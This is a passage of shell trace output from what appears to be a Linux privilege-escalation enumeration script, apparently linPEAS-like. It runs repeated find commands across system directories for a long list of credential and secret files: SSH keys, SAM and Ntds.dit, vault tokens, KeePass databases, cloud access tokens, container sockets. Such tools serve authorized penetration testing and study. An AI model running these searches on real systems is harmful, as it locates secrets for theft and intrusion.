\"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SBIN=`eval_bckgrd "find /sbin -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SNAP=`eval_bckgrd "find /snap -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SRV=`eval_bckgrd "find /srv -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"rocketchat.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_TMP=`eval_bckgrd "find /tmp -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"sess_*\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"pwd.ibd\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"agent*\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"hostapd.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_USR=`eval_bckgrd "find /usr -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"wp-config.php\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"*.ovpn\" -o -name \"ConsoleHost_history.txt\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name 